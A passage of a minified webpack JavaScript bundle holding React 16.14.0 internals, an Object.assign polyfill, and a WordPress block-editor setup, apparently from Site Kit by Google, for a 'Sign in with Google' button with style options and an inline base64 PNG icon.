e}},t.Component=B,t.Fragment=l,t.Profiler=u,t.PureComponent=b,t.StrictMode=a,t.Suspense=g,t.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED=Q,t.cloneElement=function(e,t,n){if(null==e)throw Error(C(267,e));var o=r({},e.props),i=e.key,l=e.ref,a=e._owner;if(null!=t){if(void 0!==t.ref&&(l=t.ref,a=d.current),void 0!==t.key&&(i=""+t.key),e.type&&e.type.defaultProps)var u=e.type.defaultProps;for(s in t)R.call(t,s)&&!Y.hasOwnProperty(s)&&(o[s]=void 0===t[s]&&void 0!==u?u[s]:t[s])}var s=arguments.length-2;if(1===s)o.children=n;else if(1<s){u=Array(s);for(var c=0;c<s;c++)u[c]=arguments[c+2];o.children=u}return{$$typeof:A,type:e.type,key:i,ref:l,props:o,_owner:a}},t.createContext=function(e,t){return void 0===t&&(t=null),(e={$$typeof:c,_calculateChangedBits:t,_currentValue:e,_currentValue2:e,_threadCount:0,Provider:null,Consumer:null}).Provider={$$typeof:s,_context:e},e.Consumer=e},t.createElement=j,t.createFactory=function(e){var t=j.bind(null,e);return t.type=e,t},t.createRef=function(){return{current:null}},t.forwardRef=function(e){return{$$typeof:f,render:e}},t.isValidElement=G,t.lazy=function(e){return{$$typeof:v,_ctor:e,_status:-1,_result:null}},t.memo=function(e,t){return{$$typeof:p,type:e,compare:void 0===t?null:t}},t.useCallback=function(e,t){return Z().useCallback(e,t)},t.useContext=function(e,t){return Z().useContext(e,t)},t.useDebugValue=function(){},t.useEffect=function(e,t){return Z().useEffect(e,t)},t.useImperativeHandle=function(e,t,n){return Z().useImperativeHandle(e,t,n)},t.useLayoutEffect=function(e,t){return Z().useLayoutEffect(e,t)},t.useMemo=function(e,t){return Z().useMemo(e,t)},t.useReducer=function(e,t,n){return Z().useReducer(e,t,n)},t.useRef=function(e){return Z().useRef(e)},t.useState=function(e){return Z().useState(e)},t.version="16.14.0"},540:(e,t,n)=>{e.exports=n(192)},664:e=>{var t=Object.getOwnPropertySymbols,n=Object.prototype.hasOwnProperty,r=Object.prototype.propertyIsEnumerable;e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var t={},n=0;n<10;n++)t["_"+String.fromCharCode(n)]=n;if("0123456789"!==Object.getOwnPropertyNames(t).map(function(e){return t[e]}).join(""))return!1;var r={};return"abcdefghijklmnopqrst".split("").forEach(function(e){r[e]=e}),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},r)).join("")}catch(e){return!1}}()?Object.assign:function(e,o){for(var A,i,l=function(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}(e),a=1;a<arguments.length;a++){for(var u in A=Object(arguments[a]))n.call(A,u)&&(l[u]=A[u]);if(t){i=t(A);for(var s=0;s<i.length;s++)r.call(A,i[s])&&(l[i[s]]=A[i[s]])}}return l}},696:(e,t,n)=>{e.exports=n(403)}},t={};function __webpack_require__(n){var r=t[n];if(void 0!==r)return r.exports;var o=t[n]={exports:{}};return e[n](o,o.exports,__webpack_require__),o.exports}const n=wp.blocks,r=wp.blockEditor,o=wp.components,A=wp.element,i=googlesitekit.i18n,l=[{value:"outline",label:"Light"},{value:"filled_blue",label:"Neutral"},{value:"filled_black",label:"Dark"}],a=[{value:"continue_with",label:"Continue with Google"},{value:"signin",label:"Sign in"},{value:"signin_with",label:"Sign in with Google"},{value:"signup_with",label:"Sign up with Google"}],u=[{value:"pill",label:"Pill"},{value:"rectangular",label:"Rectangular"}];var s,c,f,g=__webpack_require__(696);function p(){return p=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)({}).hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},p.apply(null,arguments)}const v=e=>g.createElement("svg",p({xmlns:"http://www.w3.org/2000/svg",xmlnsXlink:"http://www.w3.org/1999/xlink",fill:"none",viewBox:"0 0 180 41"},e),s||(s=g.createElement("rect",{width:180,height:41,fill:"#fff",rx:20.5})),c||(c=g.createElement("path",{fill:"url(#icon_svg__a)",d:"M9 8h162v26H9z"})),f||(f=g.createElement("defs",null,g.createElement("pattern",{id:"icon_svg__a",width:1,height:1,patternContentUnits:"objectBoundingBox"},g.createElement("use",{xlinkHref:"#icon_svg__b",transform:"matrix(.00309 0 0 .01923 -.117 -.692)"})),g.createElement("image",{xlinkHref:"data:image/png;base64,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